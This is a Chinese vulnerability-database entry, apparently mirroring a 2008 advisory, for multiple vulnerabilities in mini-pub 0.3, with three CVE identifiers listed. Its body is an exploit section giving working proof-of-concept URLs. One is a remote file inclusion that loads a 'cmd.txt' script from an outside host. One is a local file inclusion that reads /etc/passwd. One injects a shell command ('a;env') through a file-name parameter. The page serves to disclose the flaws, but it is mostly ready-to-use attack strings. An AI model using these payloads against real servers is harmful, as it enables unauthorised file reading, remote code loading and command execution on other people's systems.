mini-pub 0.3 multiple vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052344 漏洞类型
发布时间 2008-12-17 更新时间 2008-12-17
CVE编号 CVE-2008-5579
CVE-2008-5580
CVE-2008-5581
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008120127
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
mini-pub 0.3 multiple vulnerabilities

download   http://sourceforge.net/projects/mini-pub/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits
1. remote file inclusion
http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.co
m/cmd.txt?

2. local file inclusion
http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd

3. command execution
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv